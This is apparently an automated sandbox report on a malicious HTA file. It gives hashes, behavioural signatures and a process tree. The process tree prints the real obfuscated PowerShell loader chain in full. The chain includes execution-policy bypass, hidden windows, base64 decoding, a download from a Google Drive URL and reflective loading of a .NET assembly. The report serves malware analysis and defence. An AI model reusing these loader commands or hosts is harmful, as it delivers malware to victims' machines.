Analysis
max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 29-10-2024 12:17
Static task: static1
Behavioral task: behavioral1
Sample: nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
Resource: win7-20240708-en
Behavioral task: behavioral2
Sample: nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
Resource: win10v2004-20241007-en
General
Target: nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
Size: 131KB
MD5: 07a93908c3113536577c9c5b734a0af0
SHA1: 794af14ec431e796ca6b61ed2094f623b86d77a9
SHA256: 809e92422295976379070a5f2bb56313ca401b52d78b5d78134a08fcfd781202
SHA512: 34ef8170d518afbf42bc16a0759f3609153338e6e4bbc1ce05e94933e13ce4f6c1c8f5de7aedfe5f675311f593d5cbe377908815922d55a076eaa7c35493ba79
SSDEEP: 96:4vCt72QeBoCn7iY1opReQiY7ERPI/T5eodWQ:4vCF2QeaCmsoMY7MnAWQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
Blocklisted process makes network request 3 IoCs
flow  pid   Process
4     2692  PoWerShELL.eXE
6     1036  powershell.exe
8     1036  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid   Process
2028  powershell.exe
1036  powershell.exe
Evasion via Device Credential Deployment 2 IoCs
pid   Process
2692  PoWerShELL.eXE
1836  powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow  ioc
5     drive.google.com
6     drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                           Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   csc.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cvtres.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   mshta.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   PoWerShELL.eXE
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe

description  ioc                                                                                                          Process
Key created  \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main   mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid   Process
2692  PoWerShELL.eXE
1836  powershell.exe
2692  PoWerShELL.eXE
2692  PoWerShELL.eXE
2028  powershell.exe
1036  powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description              pid   Process
Token: SeDebugPrivilege  2692  PoWerShELL.eXE
Token: SeDebugPrivilege  1836  powershell.exe
Token: SeDebugPrivilege  2028  powershell.exe
Token: SeDebugPrivilege  1036  powershell.exe
Suspicious use of WriteProcessMemory 28 IoCs
description                       pid   Process         procid_target
PID 1724 wrote to memory of 2692  1724  mshta.exe       30
PID 1724 wrote to memory of 2692  1724  mshta.exe       30
PID 1724 wrote to memory of 2692  1724  mshta.exe       30
PID 1724 wrote to memory of 2692  1724  mshta.exe       30
PID 2692 wrote to memory of 1836  2692  PoWerShELL.eXE  32
PID 2692 wrote to memory of 1836  2692  PoWerShELL.eXE  32
PID 2692 wrote to memory of 1836  2692  PoWerShELL.eXE  32
PID 2692 wrote to memory of 1836  2692  PoWerShELL.eXE  32
PID 2692 wrote to memory of 2740  2692  PoWerShELL.eXE  33
PID 2692 wrote to memory of 2740  2692  PoWerShELL.eXE  33
PID 2692 wrote to memory of 2740  2692  PoWerShELL.eXE  33
PID 2692 wrote to memory of 2740  2692  PoWerShELL.eXE  33
PID 2740 wrote to memory of 2952  2740  csc.exe         34
PID 2740 wrote to memory of 2952  2740  csc.exe         34
PID 2740 wrote to memory of 2952  2740  csc.exe         34
PID 2740 wrote to memory of 2952  2740  csc.exe         34
PID 2692 wrote to memory of 3068  2692  PoWerShELL.eXE  36
PID 2692 wrote to memory of 3068  2692  PoWerShELL.eXE  36
PID 2692 wrote to memory of 3068  2692  PoWerShELL.eXE  36
PID 2692 wrote to memory of 3068  2692  PoWerShELL.eXE  36
PID 3068 wrote to memory of 2028  3068  WScript.exe     37
PID 3068 wrote to memory of 2028  3068  WScript.exe     37
PID 3068 wrote to memory of 2028  3068  WScript.exe     37
PID 3068 wrote to memory of 2028  3068  WScript.exe     37
PID 2028 wrote to memory of 1036  2028  powershell.exe  39
PID 2028 wrote to memory of 1036  2028  powershell.exe  39
PID 2028 wrote to memory of 1036  2028  powershell.exe  39
PID 2028 wrote to memory of 1036  2028  powershell.exe  39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE"C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'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'+[ChaR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x42fpnjy.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AB4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8AB3.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2952
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB